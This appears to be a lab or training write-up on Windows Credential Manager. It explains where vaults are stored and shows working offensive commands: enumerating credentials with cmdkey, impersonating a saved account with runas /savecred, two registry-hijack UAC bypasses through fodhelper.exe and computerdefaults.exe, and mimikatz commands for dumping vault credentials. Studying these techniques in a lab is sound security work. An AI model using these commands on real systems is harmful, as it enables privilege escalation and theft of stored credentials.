Windows Vault and Credential Manager
Credential Manager is a feature built into Windows since Server 2008 R2 and Windows 7. Thorough documentation on how it works is not publicly available, but essentially, it allows users and applications to securely store credentials relevant to other systems and websites. Credentials are stored in special encrypted folders on the computer under the user and system profiles (MITRE ATT&CK):
%UserProfile%\AppData\Local\Microsoft\Vault\%UserProfile%\AppData\Local\Microsoft\Credentials\%UserProfile%\AppData\Roaming\Microsoft\Vault\%ProgramData%\Microsoft\Vault\%SystemRoot%\System32\config\systemprofile\AppData\Roaming\Microsoft\Vault\
Each vault folder contains a Policy.vpol file with AES keys (AES-128 or AES-256) that is protected by DPAPI. These AES keys are used to encrypt the credentials. Newer versions of Windows make use of Credential Guard to further protect the DPAPI master keys by storing them in secured memory enclaves (Virtualization-based Security).
Microsoft often refers to the protected stores as Credential Lockers (formerly Windows Vaults). Credential Manager is the user-facing feature/API, while the actual encrypted stores are the vault/locker folders. The following table lists the two types of credentials Windows stores:
| Name | Description |
|---|---|
| Web Credentials | Credentials associated with websites and online accounts. This locker is used by Internet Explorer and legacy versions of Microsoft Edge. |
| Windows Credentials | Used to store login tokens for various services such as OneDrive, and credentials related to domain users, local network resources, services, and shared directories. |
It is possible to export Windows Vaults to .crd files either via Control Panel or with the following command. Backups created this way are encrypted with a password supplied by the user, and can be imported on other Windows systems.
C:\Users\sadams>rundll32 keymgr.dll,KRShowKeyMgrEnumerating credentials with cmdkey
We can use cmdkey to enumerate the credentials stored in the current user’s profile:
cmdkey /listStored credentials are listed with the following format:
| Key | Value |
|---|---|
| Target | The resource or account name the credential is for. This could be a computer, domain name, or a special identifier. |
| Type | The kind of credential. Common types are Generic for general credentials, and Domain Password for domain user logons. |
| User | The user account associated with the credential. |
| Persistence | Some credentials indicate whether a credential is saved persistently on the computer; credentials marked with Local machine persistence survive reboots. |
The first credential in the command output above, virtualapp/didlogical, is a generic credential used by Microsoft account/Windows Live services. The random looking username is an internal account ID. This entry may be ignored for our purposes.
The second credential, Domain:interactive=SRV01\mcharles, is a domain credential associated with the user SRV01\mcharles. Interactive means that the credential is used for interactive logon sessions. Whenever we come across this type of credential, we can use runas to impersonate the stored user like so:
runas /savecred /user:SRV01\mcharles cmdExtracting credentials with Mimikatz
There are many different tools that can be used to decrypt stored credentials. One of the tools we can use is mimikatz. Even within mimikatz, there are multiple ways to attack these credentials - we can either dump credentials from memory using the sekurlsa module, or we can manually decrypt credentials using the dpapi module. For this example, we will target the LSASS process with sekurlsa:
Note: Some other tools which may be used to enumerate and extract stored credentials included SharpDPAPI, LaZagne, and DonPAPI.
Exercise
GUI tools like Credential Manager and keymgr.dll failed to show the OneDrive credentials. Vaults and Registry were also empty. At this point, it was clear that the lab required Admin access to proceed further
Step 3: Bypass UAC via fodhelper.exe
First, we have to bypass the UAC, then we get Administrator Access.
Follow steps below:
I mentioned two payloads you can try one payload that your choices
Payload:
Using fodhelper.exe:
reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d “cmd.exe” && start fodhelper.exe
Using computerdefaults.exe:
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f && reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /t REG_SZ /d “cmd.exe” /f && start computerdefaults.exe
By launching the command prompt and typing whoami, it will still say we’re mcharles. However, now we can route to the Administrator folder and have full access.
privilege::debug
vault::cred